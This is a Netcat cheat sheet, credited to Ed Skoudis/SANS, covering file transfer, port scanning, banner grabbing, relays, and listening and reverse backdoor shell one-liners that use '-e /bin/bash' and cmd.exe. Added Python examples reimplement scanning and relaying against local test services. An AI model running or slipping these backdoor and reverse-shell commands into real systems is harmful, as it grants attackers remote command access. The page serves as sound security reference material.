Netcat HOWTO

Netcat relays on Linux use a named pipe (FIFO) called backpipe to carry the return direction; create it first in a temporary directory:

$ cd /tmp
$ mknod backpipe p

Push a file from client to listener:

$ nc -l -p [LocalPort] > [outfile]

Listen on [LocalPort], store results in [outfile]

$ nc -w3 [TargetIPaddr] [port] < [infile]

Push [infile] to [TargetIPaddr] on [port]

Grab the banner of any TCP service running on an IP Address from Linux:

$ echo "" | nc -v -n -w1 [TargetIPaddr] [start_port]-[end_port]

Attempt to connect to each port in a range from [end_port] to [start_port] on IP Address [TargetIPaddr] running verbosely (-v), not resolving names (-n), and waiting no more than 1 second for a connection to occur (-w1). Then send a blank string to the open port and print out any banner received in response.
Add -r to randomize destination ports within the range.
Add -p [port] to specify a source port for the scan.

Listener-to-Client Relay:

$ nc -l -p [LocalPort] 0<backpipe | nc [TargetIPaddr] [port] | tee backpipe

Create a relay that sends packets from the local port [LocalPort] to a Netcat client connected to [TargetIPaddr] on port [port]

Pull file from listener back to client:

$ nc -l -p [LocalPort] < [infile]

Listen on [LocalPort], prep to push [infile]

$ nc -w3 [TargetIPaddr] [port] > [outfile]

Connect to [TargetIPaddr] on [port] and retrieve [outfile]

Listener-to-Listener Relay:

$ nc -l -p [LocalPort_1] 0<backpipe | nc -l -p [LocalPort_2] | tee backpipe

Create a relay that sends packets from any connection on [LocalPort_1] to any connection on [LocalPort_2]

TCP Port Scanner:

Port scan an IP Address:

$ nc -v -n -z -w1 [TargetIPaddr] [start_port]-[end_port]

Attempt to connect to each port in a range from [end_port] to [start_port] on IP Address [TargetIPaddr] running verbosely (-v on Linux, -vv on Windows), not resolving names (-n), without sending any data (-z), and waiting no more than 1 second for a connection to occur (-w1).
The randomize ports (-r) switch can be used to choose port numbers randomly in the range.
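The port scan above and the banner grab earlier on this page are the same operation at the socket level: a TCP connect with a timeout, with or without a blank line sent afterwards. As an added example (not part of the cheat sheet), here is that logic in Python, run against a constructed local service that answers with a banner, so the behaviour of -z and -w1 can be checked offline when inventorying which ports on a host actually accept connections. The banner text, the loopback host and the names start_banner_server, free_closed_port, connect_scan and grab_banner are all assumptions of this example.

```python
import socket
import threading


def start_banner_server(banner: bytes, host: str = "127.0.0.1"):
    """Constructed stand-in for the [TargetIPaddr] service: send a banner to
    every client that connects. Returns (listening socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))  # port 0: the OS picks a free port
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return  # listening socket was closed
            with conn:
                try:
                    conn.sendall(banner)
                    conn.recv(64)  # consume the blank line a banner grabber sends
                except OSError:
                    pass  # client already gone (e.g. a -z style probe)

    threading.Thread(target=serve, daemon=True).start()
    return srv, port


def free_closed_port(host: str = "127.0.0.1") -> int:
    """Pick a port nothing is listening on, to stand in for a closed port."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind((host, 0))
        return s.getsockname()[1]


def connect_scan(host: str, ports, timeout: float = 1.0) -> list:
    """What `nc -v -n -z -w1 host start-end` does: try a TCP connect to each
    port, send nothing (-z), give up after `timeout` seconds (-w1), and
    report the ports that accepted the connection."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            try:
                s.connect((host, port))
            except OSError:
                continue  # refused or timed out: closed or filtered
            open_ports.append(port)
    return open_ports


def grab_banner(host: str, port: int, timeout: float = 1.0) -> str:
    """What `echo "" | nc -v -n -w1 host port` does: connect, send a blank
    line, return whatever the service answers ("" if closed or silent)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            s.sendall(b"\n")
            data = s.recv(1024)
        except OSError:
            return ""
    return data.decode("utf-8", errors="replace").strip()


if __name__ == "__main__":
    srv, port = start_banner_server(b"SSH-2.0-ConstructedBanner\r\n")
    closed = free_closed_port()
    print("open:", connect_scan("127.0.0.1", [closed, port]))
    print("banner:", repr(grab_banner("127.0.0.1", port)))
    srv.close()
```

Note that a closed port fails fast with a connection refused, while a filtered one only fails when the timeout expires, which is why -w1 matters for a range of any size: without it the scan can hang on the first dropped port.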

Backdoor Shells:

Listening backdoor shell on Linux:

$ nc -l -p [LocalPort] -e /bin/bash

Listening backdoor shell on Windows:

C:\> nc -l -p [LocalPort] -e cmd.exe

Create a shell on local port [LocalPort] that can then be accessed using a fundamental Netcat client

Client-to-Client Relay:

$ nc [PreviousHopIPaddr] [port] 0<backpipe | nc [NextHopIPaddr] [port2] | tee backpipe

Create a relay that sends packets from the connection to [PreviousHopIPaddr] on port [port] to a Netcat client connected to [NextHopIPaddr] on port [port2]
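All three relays on this page do the same thing: splice two TCP streams together in both directions, with the backpipe FIFO carrying the return direction that a plain shell pipe cannot. As an added example (not from the cheat sheet), here is that splice written in Python with one copying thread per direction, exercised against a constructed echo server standing in for the [TargetIPaddr] service, so the round trip can be verified offline. The echo server, the loopback addresses and the names start_relay, start_echo_server and relay_roundtrip are assumptions of this example; on a real host a relay of this shape is visible as a single process holding one inbound and one outbound socket, which is the thing to look for when auditing for unexpected forwarding.

```python
import socket
import threading


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes src -> dst until src hits EOF, then close dst's write side
    so the far end sees EOF too (the job `tee backpipe` and the FIFO do for
    the return direction in the shell version)."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _listen(host: str):
    """Bind a listening socket on a free port; returns (socket, port)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind((host, 0))  # port 0: the OS picks a free port
    sock.listen(1)
    return sock, sock.getsockname()[1]


def start_relay(target_host: str, target_port: int, listen_host: str = "127.0.0.1"):
    """Listener-to-client relay: accept one inbound connection on a local
    port, open an outbound connection to target_host:target_port, and splice
    the two streams in both directions. Returns (listening socket, port)."""
    lsock, local_port = _listen(listen_host)

    def accept_and_splice():
        try:
            inbound, _ = lsock.accept()
        except OSError:
            return  # listening socket closed before a client arrived
        outbound = socket.create_connection((target_host, target_port), timeout=3)
        outbound.settimeout(None)
        threading.Thread(target=_pump, args=(inbound, outbound), daemon=True).start()
        threading.Thread(target=_pump, args=(outbound, inbound), daemon=True).start()

    threading.Thread(target=accept_and_splice, daemon=True).start()
    return lsock, local_port


def start_echo_server(host: str = "127.0.0.1"):
    """Constructed stand-in for the [TargetIPaddr] service: echo until EOF."""
    esock, port = _listen(host)

    def serve():
        try:
            conn, _ = esock.accept()
        except OSError:
            return
        with conn:
            _pump(conn, conn)  # echo: what comes in from the client goes back to it

    threading.Thread(target=serve, daemon=True).start()
    return esock, port


def relay_roundtrip(payload: bytes) -> bytes:
    """Send payload through client -> relay -> echo server and return what
    comes back; equals payload when the relay forwards both ways correctly."""
    esock, eport = start_echo_server()
    rsock, rport = start_relay("127.0.0.1", eport)
    received = b""
    with socket.create_connection(("127.0.0.1", rport), timeout=5) as client:
        client.sendall(payload)
        client.shutdown(socket.SHUT_WR)  # tell the chain we are done sending
        while True:
            chunk = client.recv(4096)
            if not chunk:
                break
            received += chunk
    rsock.close()
    esock.close()
    return received


if __name__ == "__main__":
    print(relay_roundtrip(b"ping through the relay\n"))
```

The half-close in _pump is what makes teardown clean: EOF travels client -> relay -> server and back as a chain of SHUT_WR calls, so each side finishes reading before anything is torn down. A relay that simply closes both sockets when one side goes quiet drops data still in flight.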

Reverse backdoor shell on Linux:

$ nc [YourIPaddr] [port] -e /bin/bash

Reverse backdoor shell on Windows:

C:\> nc [YourIPaddr] [port] -e cmd.exe

Create a reverse shell that will attempt to connect to [YourIPaddr] on local port [port]. This shell can then be captured using a fundamental nc listener.

Thanks to Ed Skoudis for providing a huge variety of cheats on nc @ http://www.sans.org
